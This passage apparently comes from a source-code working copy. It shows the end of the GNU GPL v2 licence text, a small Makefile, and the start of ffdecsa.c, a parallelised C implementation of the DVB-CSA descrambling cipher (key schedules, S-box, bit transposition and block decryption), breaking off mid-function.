carry prominent notices 96 stating that you changed the files and the date of any change. 97 98 b) You must cause any work that you distribute or publish, that in 99 whole or in part contains or is derived from the Program or any 100 part thereof, to be licensed as a whole at no charge to all third 101 parties under the terms of this License. 102 103 c) If the modified program normally reads commands interactively 104 when run, you must cause it, when started running for such 105 interactive use in the most ordinary way, to print or display an 106 announcement including an appropriate copyright notice and a 107 notice that there is no warranty (or else, saying that you provide 108 a warranty) and that users may redistribute the program under 109 these conditions, and telling the user how to view a copy of this 110 License. (Exception: if the Program itself is interactive but 111 does not normally print such an announcement, your work based on 112 the Program is not required to print an announcement.) 113 114 These requirements apply to the modified work as a whole. If 115 identifiable sections of that work are not derived from the Program, 116 and can be reasonably considered independent and separate works in 117 themselves, then this License, and its terms, do not apply to those 118 sections when you distribute them as separate works. But when you 119 distribute the same sections as part of a whole which is a work based 120 on the Program, the distribution of the whole must be on the terms of 121 this License, whose permissions for other licensees extend to the 122 entire whole, and thus to each and every part regardless of who wrote it. 123 124 Thus, it is not the intent of this section to claim rights or contest 125 your rights to work written entirely by you; rather, the intent is to 126 exercise the right to control the distribution of derivative or 127 collective works based on the Program. 128 129 In addition, mere aggregation of another work not based on the Program 130 with the Program (or with a work based on the Program) on a volume of 131 a storage or distribution medium does not bring the other work under 132 the scope of this License. 133 134 3. You may copy and distribute the Program (or a work based on it, 135 under Section 2) in object code or executable form under the terms of 136 Sections 1 and 2 above provided that you also do one of the following: 137 138 a) Accompany it with the complete corresponding machine-readable 139 source code, which must be distributed under the terms of Sections 140 1 and 2 above on a medium customarily used for software interchange; or, 141 142 b) Accompany it with a written offer, valid for at least three 143 years, to give any third party, for a charge no more than your 144 cost of physically performing source distribution, a complete 145 machine-readable copy of the corresponding source code, to be 146 distributed under the terms of Sections 1 and 2 above on a medium 147 customarily used for software interchange; or, 148 149 c) Accompany it with the information you received as to the offer 150 to distribute corresponding source code. (This alternative is 151 allowed only for noncommercial distribution and only if you 152 received the program in object code or executable form with such 153 an offer, in accord with Subsection b above.) 154 155 The source code for a work means the preferred form of the work for 156 making modifications to it. For an executable work, complete source 157 code means all the source code for all modules it contains, plus any 158 associated interface definition files, plus the scripts used to 159 control compilation and installation of the executable. However, as a 160 special exception, the source code distributed need not include 161 anything that is normally distributed (in either source or binary 162 form) with the major components (compiler, kernel, and so on) of the 163 operating system on which the executable runs, unless that component 164 itself accompanies the executable. 165 166 If distribution of executable or object code is made by offering 167 access to copy from a designated place, then offering equivalent 168 access to copy the source code from the same place counts as 169 distribution of the source code, even though third parties are not 170 compelled to copy the source along with the object code. 171 172 4. You may not copy, modify, sublicense, or distribute the Program 173 except as expressly provided under this License. Any attempt 174 otherwise to copy, modify, sublicense or distribute the Program is 175 void, and will automatically terminate your rights under this License. 176 However, parties who have received copies, or rights, from you under 177 this License will not have their licenses terminated so long as such 178 parties remain in full compliance. 179 180 5. You are not required to accept this License, since you have not 181 signed it. However, nothing else grants you permission to modify or 182 distribute the Program or its derivative works. These actions are 183 prohibited by law if you do not accept this License. Therefore, by 184 modifying or distributing the Program (or any work based on the 185 Program), you indicate your acceptance of this License to do so, and 186 all its terms and conditions for copying, distributing or modifying 187 the Program or works based on it. 188 189 6. Each time you redistribute the Program (or any work based on the 190 Program), the recipient automatically receives a license from the 191 original licensor to copy, distribute or modify the Program subject to 192 these terms and conditions. You may not impose any further 193 restrictions on the recipients' exercise of the rights granted herein. 194 You are not responsible for enforcing compliance by third parties to 195 this License. 196 197 7. If, as a consequence of a court judgment or allegation of patent 198 infringement or for any other reason (not limited to patent issues), 199 conditions are imposed on you (whether by court order, agreement or 200 otherwise) that contradict the conditions of this License, they do not 201 excuse you from the conditions of this License. If you cannot 202 distribute so as to satisfy simultaneously your obligations under this 203 License and any other pertinent obligations, then as a consequence you 204 may not distribute the Program at all. For example, if a patent 205 license would not permit royalty-free redistribution of the Program by 206 all those who receive copies directly or indirectly through you, then 207 the only way you could satisfy both it and this License would be to 208 refrain entirely from distribution of the Program. 209 210 If any portion of this section is held invalid or unenforceable under 211 any particular circumstance, the balance of the section is intended to 212 apply and the section as a whole is intended to apply in other 213 circumstances. 214 215 It is not the purpose of this section to induce you to infringe any 216 patents or other property right claims or to contest validity of any 217 such claims; this section has the sole purpose of protecting the 218 integrity of the free software distribution system, which is 219 implemented by public license practices. Many people have made 220 generous contributions to the wide range of software distributed 221 through that system in reliance on consistent application of that 222 system; it is up to the author/donor to decide if he or she is willing 223 to distribute software through any other system and a licensee cannot 224 impose that choice. 225 226 This section is intended to make thoroughly clear what is believed to 227 be a consequence of the rest of this License. 228 229 8. If the distribution and/or use of the Program is restricted in 230 certain countries either by patents or by copyrighted interfaces, the 231 original copyright holder who places the Program under this License 232 may add an explicit geographical distribution limitation excluding 233 those countries, so that distribution is permitted only in or among 234 countries not thus excluded. In such case, this License incorporates 235 the limitation as if written in the body of this License. 236 237 9. The Free Software Foundation may publish revised and/or new versions 238 of the General Public License from time to time. Such new versions will 239 be similar in spirit to the present version, but may differ in detail to 240 address new problems or concerns. 241 242 Each version is given a distinguishing version number. If the Program 243 specifies a version number of this License which applies to it and "any 244 later version", you have the option of following the terms and conditions 245 either of that version or of any later version published by the Free 246 Software Foundation. If the Program does not specify a version number of 247 this License, you may choose any version ever published by the Free Software 248 Foundation. 249 250 10. If you wish to incorporate parts of the Program into other free 251 programs whose distribution conditions are different, write to the author 252 to ask for permission. For software which is copyrighted by the Free 253 Software Foundation, write to the Free Software Foundation; we sometimes 254 make exceptions for this. Our decision will be guided by the two goals 255 of preserving the free status of all derivatives of our free software and 256 of promoting the sharing and reuse of software generally. 257 258 NO WARRANTY 259 260 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 REPAIR OR CORRECTION. 269 270 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 POSSIBILITY OF SUCH DAMAGES. 279 280 END OF TERMS AND CONDITIONS 281 282 Appendix: How to Apply These Terms to Your New Programs 283 284 If you develop a new program, and you want it to be of the greatest 285 possible use to the public, the best way to achieve this is to make it 286 free software which everyone can redistribute and change under these terms. 287 288 To do so, attach the following notices to the program. It is safest 289 to attach them to the start of each source file to most effectively 290 convey the exclusion of warranty; and each file should have at least 291 the "copyright" line and a pointer to where the full notice is found. 292 293 <one line to give the program's name and a brief idea of what it does.> 294 Copyright (C) 19yy <name of author> 295 296 This program is free software; you can redistribute it and/or modify 297 it under the terms of the GNU General Public License as published by 298 the Free Software Foundation; either version 2 of the License, or 299 (at your option) any later version. 300 301 This program is distributed in the hope that it will be useful, 302 but WITHOUT ANY WARRANTY; without even the implied warranty of 303 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 GNU General Public License for more details. 305 306 You should have received a copy of the GNU General Public License 307 along with this program; if not, write to the Free Software 308 Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. 309 310 Also add information on how to contact you by electronic and paper mail. 311 312 If the program is interactive, make it output a short notice like this 313 when it starts in an interactive mode: 314 315 Gnomovision version 69, Copyright (C) 19yy name of author 316 Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 This is free software, and you are welcome to redistribute it 318 under certain conditions; type `show c' for details. 319 320 The hypothetical commands `show w' and `show c' should show the appropriate 321 parts of the General Public License. Of course, the commands you use may 322 be called something other than `show w' and `show c'; they could even be 323 mouse-clicks or menu items--whatever suits your program. 324 325 You should also get your employer (if you work as a programmer) or your 326 school, if any, to sign a "copyright disclaimer" for the program, if 327 necessary. Here is a sample; alter the names: 328 329 Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 332 <signature of Ty Coon>, 1 April 1989 333 Ty Coon, President of Vice 334 335 This General Public License does not permit incorporating your program into 336 proprietary programs. If your program is a subroutine library, you may 337 consider it more useful to permit linking proprietary applications with the 338 library. If this is what you want to do, use the GNU Library General 339 Public License instead of this License. ffdecsa/Makefile (working copy) 1 parent: 2 @$(MAKE) --no-print-directory -C .. ffdecsa/ffdecsa.c (working copy) 1 /* FFdecsa -- fast decsa algorithm 2 * 3 * Copyright (C) 2003-2004 fatih89r 4 * 5 * This program is free software; you can redistribute it and/or modify 6 * it under the terms of the GNU General Public License as published by 7 * the Free Software Foundation; either version 2 of the License, or 8 * (at your option) any later version. 9 * 10 * This program is distributed in the hope that it will be useful, 11 * but WITHOUT ANY WARRANTY; without even the implied warranty of 12 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 * GNU General Public License for more details. 14 * 15 * You should have received a copy of the GNU General Public License 16 * along with this program; if not, write to the Free Software 17 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. 18 */ 19 20 21 #include <sys/types.h> 22 #include <string.h> 23 #include <stdio.h> 24 #include <stdlib.h> 25 26 #include "ffdecsa.h" 27 28 #ifndef NULL 29 #define NULL 0 30 #endif 31 32 //#define DEBUG 33 #ifdef DEBUG 34 #define DBG(a) a 35 #else 36 #define DBG(a) 37 #endif 38 39 //// parallelization stuff, large speed differences are possible 40 // possible choices 41 #define PARALLEL_32_4CHAR 320 42 #define PARALLEL_32_4CHARA 321 43 #define PARALLEL_32_INT 322 44 #define PARALLEL_64_8CHAR 640 45 #define PARALLEL_64_8CHARA 641 46 #define PARALLEL_64_2INT 642 47 #define PARALLEL_64_LONG 643 48 #define PARALLEL_64_MMX 644 49 #define PARALLEL_128_16CHAR 1280 50 #define PARALLEL_128_16CHARA 1281 51 #define PARALLEL_128_4INT 1282 52 #define PARALLEL_128_2LONG 1283 53 #define PARALLEL_128_2MMX 1284 54 #define PARALLEL_128_SSE 1285 55 #define PARALLEL_128_SSE2 1286 56 57 //////// our choice //////////////// our choice //////////////// our choice //////////////// our choice //////// 58 #ifndef PARALLEL_MODE 59 60 #if defined(__x86_64__) || defined(_M_X64) 61 #define PARALLEL_MODE PARALLEL_128_SSE2 62 63 #elif defined(__mips__) || defined(__mips) || defined(__MIPS__) 64 #define PARALLEL_MODE PARALLEL_64_LONG 65 66 #elif defined(__sh__) || defined(__SH4__) 67 #define PARALLEL_MODE PARALLEL_32_INT 68 #define COPY_UNALIGNED_PKT 69 #define MEMALIGN_VAL 4 70 71 #else 72 #define PARALLEL_MODE PARALLEL_32_INT 73 #endif 74 75 #endif 76 //////// our choice //////////////// our choice //////////////// our choice //////////////// our choice //////// 77 78 #include "parallel_generic.h" 79 //// conditionals 80 #if PARALLEL_MODE==PARALLEL_32_4CHAR 81 #include "parallel_032_4char.h" 82 #elif PARALLEL_MODE==PARALLEL_32_4CHARA 83 #include "parallel_032_4charA.h" 84 #elif PARALLEL_MODE==PARALLEL_32_INT 85 #include "parallel_032_int.h" 86 #elif PARALLEL_MODE==PARALLEL_64_8CHAR 87 #include "parallel_064_8char.h" 88 #elif PARALLEL_MODE==PARALLEL_64_8CHARA 89 #include "parallel_064_8charA.h" 90 #elif PARALLEL_MODE==PARALLEL_64_2INT 91 #include "parallel_064_2int.h" 92 #elif PARALLEL_MODE==PARALLEL_64_LONG 93 #include "parallel_064_long.h" 94 #elif PARALLEL_MODE==PARALLEL_64_MMX 95 #include "parallel_064_mmx.h" 96 #elif PARALLEL_MODE==PARALLEL_128_16CHAR 97 #include "parallel_128_16char.h" 98 #elif PARALLEL_MODE==PARALLEL_128_16CHARA 99 #include "parallel_128_16charA.h" 100 #elif PARALLEL_MODE==PARALLEL_128_4INT 101 #include "parallel_128_4int.h" 102 #elif PARALLEL_MODE==PARALLEL_128_2LONG 103 #include "parallel_128_2long.h" 104 #elif PARALLEL_MODE==PARALLEL_128_2MMX 105 #include "parallel_128_2mmx.h" 106 #elif PARALLEL_MODE==PARALLEL_128_SSE 107 #include "parallel_128_sse.h" 108 #elif PARALLEL_MODE==PARALLEL_128_SSE2 109 #include "parallel_128_sse2.h" 110 #else 111 #error "unknown/undefined parallel mode" 112 #endif 113 114 // stuff depending on conditionals 115 116 #define BYTES_PER_GROUP (GROUP_PARALLELISM/8) 117 #define BYPG BYTES_PER_GROUP 118 #define BITS_PER_GROUP GROUP_PARALLELISM 119 #define BIPG BITS_PER_GROUP 120 121 // platform specific 122 123 #ifdef __arm__ 124 #if !defined(MEMALIGN_VAL) || MEMALIGN_VAL<4 125 #undef MEMALIGN_VAL 126 #define MEMALIGN_VAL 4 127 #endif 128 #define COPY_UNALIGNED_PKT 129 #endif 130 131 // 132 133 #ifndef MALLOC 134 #define MALLOC(X) malloc(X) 135 #endif 136 #ifndef FREE 137 #define FREE(X) free(X) 138 #endif 139 #ifdef MEMALIGN_VAL 140 #define MEMALIGN __attribute__((aligned(MEMALIGN_VAL))) 141 #else 142 #define MEMALIGN 143 #endif 144 145 //// debug tool 146 147 #ifdef DEBUG 148 static void dump_mem(const char *string, const unsigned char *p, int len, int linelen){ 149 int i; 150 for(i=0;i<len;i++){ 151 if(i%linelen==0&&i) fprintf(stderr,"\n"); 152 if(i%linelen==0) fprintf(stderr,"%s %08x:",string,i); 153 else{ 154 if(i%8==0) fprintf(stderr," "); 155 if(i%4==0) fprintf(stderr," "); 156 } 157 fprintf(stderr," %02x",p[i]); 158 } 159 if(i%linelen==0) fprintf(stderr,"\n"); 160 } 161 #endif 162 163 ////////////////////////////////////////////////////////////////////////////////// 164 165 struct csa_key_t{ 166 unsigned char ck[8]; 167 // used by stream 168 int iA[8]; // iA[0] is for A1, iA[7] is for A8 169 int iB[8]; // iB[0] is for B1, iB[7] is for B8 170 // used by stream (group) 171 MEMALIGN group ck_g[8][8]; // [byte][bit:0=LSB,7=MSB] 172 MEMALIGN group iA_g[8][4]; // [0 for A1][0 for LSB] 173 MEMALIGN group iB_g[8][4]; // [0 for B1][0 for LSB] 174 // used by block 175 unsigned char kk[56]; 176 // used by block (group) 177 MEMALIGN batch kkmulti[56]; // many times the same byte in every batch 178 }; 179 180 struct csa_keys_t{ 181 struct csa_key_t even; 182 struct csa_key_t odd; 183 }; 184 185 //-----stream cypher 186 187 //-----key schedule for stream decypher 188 static void key_schedule_stream( 189 unsigned char *ck, // [In] ck[0]-ck[7] 8 bytes | Key. 190 int *iA, // [Out] iA[0]-iA[7] 8 nibbles | Key schedule. 191 int *iB) // [Out] iB[0]-iB[7] 8 nibbles | Key schedule. 192 { 193 iA[0]=(ck[0]>>4)&0xf; 194 iA[1]=(ck[0] )&0xf; 195 iA[2]=(ck[1]>>4)&0xf; 196 iA[3]=(ck[1] )&0xf; 197 iA[4]=(ck[2]>>4)&0xf; 198 iA[5]=(ck[2] )&0xf; 199 iA[6]=(ck[3]>>4)&0xf; 200 iA[7]=(ck[3] )&0xf; 201 iB[0]=(ck[4]>>4)&0xf; 202 iB[1]=(ck[4] )&0xf; 203 iB[2]=(ck[5]>>4)&0xf; 204 iB[3]=(ck[5] )&0xf; 205 iB[4]=(ck[6]>>4)&0xf; 206 iB[5]=(ck[6] )&0xf; 207 iB[6]=(ck[7]>>4)&0xf; 208 iB[7]=(ck[7] )&0xf; 209 } 210 211 //----- stream main function 212 213 #define STREAM_INIT 214 #include "stream.c" 215 #undef STREAM_INIT 216 217 #define STREAM_NORMAL 218 #include "stream.c" 219 #undef STREAM_NORMAL 220 221 222 //-----block decypher 223 224 //-----key schedule for block decypher 225 226 static void key_schedule_block( 227 unsigned char *ck, // [In] ck[0]-ck[7] 8 bytes | Key. 228 unsigned char *kk) // [Out] kk[0]-kk[55] 56 bytes | Key schedule. 229 { 230 static const unsigned char key_perm[0x40] = { 231 0x12,0x24,0x09,0x07,0x2A,0x31,0x1D,0x15, 0x1C,0x36,0x3E,0x32,0x13,0x21,0x3B,0x40, 232 0x18,0x14,0x25,0x27,0x02,0x35,0x1B,0x01, 0x22,0x04,0x0D,0x0E,0x39,0x28,0x1A,0x29, 233 0x33,0x23,0x34,0x0C,0x16,0x30,0x1E,0x3A, 0x2D,0x1F,0x08,0x19,0x17,0x2F,0x3D,0x11, 234 0x3C,0x05,0x38,0x2B,0x0B,0x06,0x0A,0x2C, 0x20,0x3F,0x2E,0x0F,0x03,0x26,0x10,0x37, 235 }; 236 237 int i,j,k; 238 int bit[64]; 239 int newbit[64]; 240 int kb[7][8]; 241 242 // 56 steps 243 // 56 key bytes kk(55)..kk(0) by key schedule from ck 244 245 // kb(6,0) .. kb(6,7) = ck(0) .. ck(7) 246 kb[6][0] = ck[0]; 247 kb[6][1] = ck[1]; 248 kb[6][2] = ck[2]; 249 kb[6][3] = ck[3]; 250 kb[6][4] = ck[4]; 251 kb[6][5] = ck[5]; 252 kb[6][6] = ck[6]; 253 kb[6][7] = ck[7]; 254 255 // calculate kb[5] .. kb[0] 256 for(i=5; i>=0; i--){ 257 // 64 bit perm on kb 258 for(j=0; j<8; j++){ 259 for(k=0; k<8; k++){ 260 bit[j*8+k] = (kb[i+1][j] >> (7-k)) & 1; 261 newbit[key_perm[j*8+k]-1] = bit[j*8+k]; 262 } 263 } 264 for(j=0; j<8; j++){ 265 kb[i][j] = 0; 266 for(k=0; k<8; k++){ 267 kb[i][j] |= newbit[j*8+k] << (7-k); 268 } 269 } 270 } 271 272 // xor to give kk 273 for(i=0; i<7; i++){ 274 for(j=0; j<8; j++){ 275 kk[i*8+j] = kb[i][j] ^ i; 276 } 277 } 278 279 } 280 281 //-----block utils 282 283 static inline __attribute__((always_inline)) void trasp_N_8 (unsigned char *in,unsigned char* out,int count){ 284 int *ri=(int *)in; 285 int *ibi=(int *)out; 286 int j,i,k,g; 287 // copy and first step 288 for(g=0;g<count;g++){ 289 ri[g]=ibi[2*g]; 290 ri[GROUP_PARALLELISM+g]=ibi[2*g+1]; 291 } 292 //dump_mem("NE1 r[roff]",&r[roff],GROUP_PARALLELISM*8,GROUP_PARALLELISM); 293 // now 01230123 294 #define INTS_PER_ROW (GROUP_PARALLELISM/8*2) 295 for(j=0;j<8;j+=4){ 296 for(i=0;i<2;i++){ 297 for(k=0;k<INTS_PER_ROW;k++){ 298 unsigned int t,b; 299 t=ri[INTS_PER_ROW*(j+i)+k]; 300 b=ri[INTS_PER_ROW*(j+i+2)+k]; 301 ri[INTS_PER_ROW*(j+i)+k]= (t&0x0000ffff) | ((b )<<16); 302 ri[INTS_PER_ROW*(j+i+2)+k]= ((t )>>16) | (b&0xffff0000) ; 303 } 304 } 305 } 306 //dump_mem("NE2 r[roff]",&r[roff],GROUP_PARALLELISM*8,GROUP_PARALLELISM); 307 // now 01010101 308 for(j=0;j<8;j+=2){ 309 for(i=0;i<1;i++){ 310 for(k=0;k<INTS_PER_ROW;k++){ 311 unsigned int t,b; 312 t=ri[INTS_PER_ROW*(j+i)+k]; 313 b=ri[INTS_PER_ROW*(j+i+1)+k]; 314 ri[INTS_PER_ROW*(j+i)+k]= (t&0x00ff00ff) | ((b&0x00ff00ff)<<8); 315 ri[INTS_PER_ROW*(j+i+1)+k]= ((t&0xff00ff00)>>8) | (b&0xff00ff00); 316 } 317 } 318 } 319 //dump_mem("NE3 r[roff]",&r[roff],GROUP_PARALLELISM*8,GROUP_PARALLELISM); 320 // now 00000000 321 } 322 323 static inline __attribute__((always_inline)) void trasp_8_N (unsigned char *in,unsigned char* out,int count){ 324 int *ri=(int *)in; 325 int *bdi=(int *)out; 326 int j,i,k,g; 327 #define INTS_PER_ROW (GROUP_PARALLELISM/8*2) 328 //dump_mem("NE1 r[roff]",&r[roff],GROUP_PARALLELISM*8,GROUP_PARALLELISM); 329 // now 00000000 330 for(j=0;j<8;j+=2){ 331 for(i=0;i<1;i++){ 332 for(k=0;k<INTS_PER_ROW;k++){ 333 unsigned int t,b; 334 t=ri[INTS_PER_ROW*(j+i)+k]; 335 b=ri[INTS_PER_ROW*(j+i+1)+k]; 336 ri[INTS_PER_ROW*(j+i)+k]= (t&0x00ff00ff) | ((b&0x00ff00ff)<<8); 337 ri[INTS_PER_ROW*(j+i+1)+k]= ((t&0xff00ff00)>>8) | (b&0xff00ff00); 338 } 339 } 340 } 341 //dump_mem("NE2 r[roff]",&r[roff],GROUP_PARALLELISM*8,GROUP_PARALLELISM); 342 // now 01010101 343 for(j=0;j<8;j+=4){ 344 for(i=0;i<2;i++){ 345 for(k=0;k<INTS_PER_ROW;k++){ 346 unsigned int t,b; 347 t=ri[INTS_PER_ROW*(j+i)+k]; 348 b=ri[INTS_PER_ROW*(j+i+2)+k]; 349 ri[INTS_PER_ROW*(j+i)+k]= (t&0x0000ffff) | ((b )<<16); 350 ri[INTS_PER_ROW*(j+i+2)+k]= ((t )>>16) | (b&0xffff0000) ; 351 } 352 } 353 } 354 //dump_mem("NE3 r[roff]",&r[roff],GROUP_PARALLELISM*8,GROUP_PARALLELISM); 355 // now 01230123 356 for(g=0;g<count;g++){ 357 bdi[2*g]=ri[g]; 358 bdi[2*g+1]=ri[GROUP_PARALLELISM+g]; 359 } 360 } 361 362 //-----block main function 363 364 // block group 365 static void block_decypher_group( 366 batch *kkmulti, // [In] kkmulti[0]-kkmulti[55] 56 batches | Key schedule (each batch has repeated equal bytes). 367 unsigned char *ib, // [In] (ib0,ib1,...ib7)...x32 32*8 bytes | Initialization vector. 368 unsigned char *bd, // [Out] (bd0,bd1,...bd7)...x32 32*8 bytes | Block decipher. 369 int count) 370 { 371 // int is faster than unsigned char. apparently not 372 static const unsigned char block_sbox[0x100] = { 373 0x3A,0xEA,0x68,0xFE,0x33,0xE9,0x88,0x1A, 0x83,0xCF,0xE1,0x7F,0xBA,0xE2,0x38,0x12, 374 0xE8,0x27,0x61,0x95,0x0C,0x36,0xE5,0x70, 0xA2,0x06,0x82,0x7C,0x17,0xA3,0x26,0x49, 375 0xBE,0x7A,0x6D,0x47,0xC1,0x51,0x8F,0xF3, 0xCC,0x5B,0x67,0xBD,0xCD,0x18,0x08,0xC9, 376 0xFF,0x69,0xEF,0x03,0x4E,0x48,0x4A,0x84, 0x3F,0xB4,0x10,0x04,0xDC,0xF5,0x5C,0xC6, 377 0x16,0xAB,0xAC,0x4C,0xF1,0x6A,0x2F,0x3C, 0x3B,0xD4,0xD5,0x94,0xD0,0xC4,0x63,0x62, 378 0x71,0xA1,0xF9,0x4F,0x2E,0xAA,0xC5,0x56, 0xE3,0x39,0x93,0xCE,0x65,0x64,0xE4,0x58, 379 0x6C,0x19,0x42,0x79,0xDD,0xEE,0x96,0xF6, 0x8A,0xEC,0x1E,0x85,0x53,0x45,0xDE,0xBB, 380 0x7E,0x0A,0x9A,0x13,0x2A,0x9D,0xC2,0x5E, 0x5A,0x1F,0x32,0x35,0x9C,0xA8,0x73,0x30, 381 382 0x29,0x3D,0xE7,0x92,0x87,0x1B,0x2B,0x4B, 0xA5,0x57,0x97,0x40,0x15,0xE6,0xBC,0x0E, 383 0xEB,0xC3,0x34,0x2D,0xB8,0x44,0x25,0xA4, 0x1C,0xC7,0x23,0xED,0x90,0x6E,0x50,0x00, 384 0x99,0x9E,0x4D,0xD9,0xDA,0x8D,0x6F,0x5F, 0x3E,0xD7,0x21,0x74,0x86,0xDF,0x6B,0x05, 385 0x8E,0x5D,0x37,0x11,0xD2,0x28,0x75,0xD6, 0xA7,0x77,0x24,0xBF,0xF0,0xB0,0x02,0xB7, 386 0xF8,0xFC,0x81,0x09,0xB1,0x01,0x76,0x91, 0x7D,0x0F,0xC8,0xA0,0xF2,0xCB,0x78,0x60, 387 0xD1,0xF7,0xE0,0xB5,0x98,0x22,0xB3,0x20, 0x1D,0xA6,0xDB,0x7B,0x59,0x9F,0xAE,0x31, 388 0xFB,0xD3,0xB6,0xCA,0x43,0x72,0x07,0xF4, 0xD8,0x41,0x14,0x55,0x0D,0x54,0x8B,0xB9, 389 0xAD,0x46,0x0B,0xAF,0x80,0x52,0x2C,0xFA, 0x8C,0x89,0x66,0xFD,0xB2,0xA9,0x9B,0xC0, 390 }; 391 MEMALIGN unsigned char r[GROUP_PARALLELISM*(8+56)]; /* 56 because we will move back in memory while looping */ 392 MEMALIGN unsigned char sbox_in[GROUP_PARALLELISM],sbox_out[GROUP_PARALLELISM],perm_out[GROUP_PARALLELISM]; 393 int roff; 394 int i,g,count_all=GROUP_PARALLELISM; 395 396 roff=GROUP_PARALLELISM*56; 397 398 #define FASTTRASP1 399 #ifndef FASTTRASP1 400 for(g=0;g<count;g++){ 401 // Init registers 402 int j; 403 for(j=0;j<8;j++){ 404 r[roff+GROUP_PARALLELISM*j+g]=ib[8*g+j]; 405 } 406 } 407 #else 408 trasp_N_8((unsigned char *)&r[roff],(unsigned char *)ib,count); 409 #endif 410 //dump_mem("OLD r[roff]",&r[roff],GROUP_PARALLELISM*8,GROUP_PARALLELISM); 411 412 // loop over kk[55]..kk[0] 413 for(i=55;i>=0;i--){ 414 { 415 MEMALIGN batch tkkmulti=kkmulti[i]; 416 batch *si=(batch *)sbox_in; 417 batch *r6_N=(batch *)(r+roff+GROUP_PARALLELISM*6); 418 for(g=0;g<count_all/BYTES_PER_BATCH;g++){ 419 si[g]=B_FFXOR(tkkmulti,r6_N[g]); //FIXME: introduce FASTBATCH? 420 } 421 } 422 423 // table lookup, this works on only one byte at a time 424 // most difficult part of all 425 // - can't be parallelized 426 // - can't be synthetized through boolean terms (8 input bits are too many) 427 for(g=0;g<count_all;g++){ 428 sbox_out[g]=block_sbox[sbox_in[g]]; 429 } 430 431 // bit permutation 432 { 433 unsigned char *po=(unsigned char *)perm_out; 434 unsigned char *so=(unsigned char *)sbox_out; 435 //dump_mem("pre perm ",(unsigned char *)so,GROUP_PARALLELISM,GROUP_PARALLELISM); 436 for(g=0;g<count_all;g+=BYTES_PER_BATCH){ 437 MEMALIGN batch in,out; 438 in=*(batch *)&so[g]; 439 440 out=B_FFOR( 441 B_FFOR( 442 B_FFOR( 443 B_FFOR( 444 B_FFOR( 445 B_FFSH8L(B_FFAND(in,B_FFN_ALL_29()),1), 446 B_FFSH8L(B_FFAND(in,B_FFN_ALL_02()),6)), 447 B_FFSH8L(B_FFAND(in,B_FFN_ALL_04()),3)), 448 B_FFSH8R(B_FFAND(in,B_FFN_ALL_10()),2)), 449 B_FFSH8R(B_FFAND(in,B_FFN_ALL_40()),6)), 450 B_FFSH8R(B_FFAND(in,B_FFN_ALL_80()),4)); 451 452 *(batch *)&po[g]=out; 453 } 454 //dump_mem("post perm",(unsigned char *)po,GROUP_PARALLELISM,GROUP_PARALLELISM); 455 } 456 457 roff-=GROUP_PARALLELISM; /* virtual shift of registers */ 458 459 #if 0 460 /* one by one */ 461 for(g=0;g<count_all;g++){ 462 r[roff+GROUP_PARALLELISM*0+g]=r[roff+GROUP_PARALLELISM*8+g]^sbox_out[g]; 463 r[roff+GROUP_PARALLELISM*6+g]^=perm_out[g]; 464 r[roff+GROUP_PARALLELISM*4+g]^=r[roff+GROUP_PARALLELISM*0+g]; 465 r[roff+GROUP_PARALLELISM*3+g]^=r[roff+GROUP_PARALLELISM*0+g]; 466 r[roff+GROUP_PARALLELISM*2+g]^=r[roff+GROUP_PARALLELISM*0+g]; 467 } 468 #else 469 for(g=0;g<count_all;g+=BEST_SPAN){ 470 XOR_BEST_BY(&r[roff+GROUP_PARALLELISM*0+g],&r[roff+GROUP_PARALLELISM*8+g],&sbox_out[g]); 471 XOREQ_BEST_BY(&r[roff+GROUP_PARALLELISM*6+g],&perm_out[g]); 472 XOREQ_BEST_BY(&r[roff+GROUP_PARALLELISM*4+g],&r[roff+GROUP_PARALLELISM*0+g]); 473 XOREQ_BEST_BY(&r[roff+GROUP_PARALLELISM*3+g],&r[roff+GROUP_PARALLELISM*0+g]); 474 XOREQ_BEST_BY(&r[roff+GROUP_PARALLELISM*2+g],&r[roff+GROUP_PARALLELISM*0+g]); 475 } 476 #endif 477 } 478 479 #define FASTTRASP2 480 #ifndef FASTTRASP2 481 for(g=0;g<count;g++){ 482 // Copy results 483 int j; 484 for(j=0;j<8;j++){ 485 bd[8*g+j]=r[roff+GROUP_PARALLELISM*j+g]; 486 } 487 } 488 #else 489 trasp_8_N((unsigned char *)&r[roff],(unsigned char *)bd,count); 490 #endif 491 } 492 493 //-----------------------------------EXTERNAL INTERFACE 494 495 //-----get internal parallelism 496 497 int get_internal_parallelism(void){ 498 return GROUP_PARALLELISM; 499 } 500 501 //-----get suggested cluster size 502 503 int get_suggested_cluster_size(void){ 504 int r; 505 r=GROUP_PARALLELISM+GROUP_PARALLELISM/10; 506 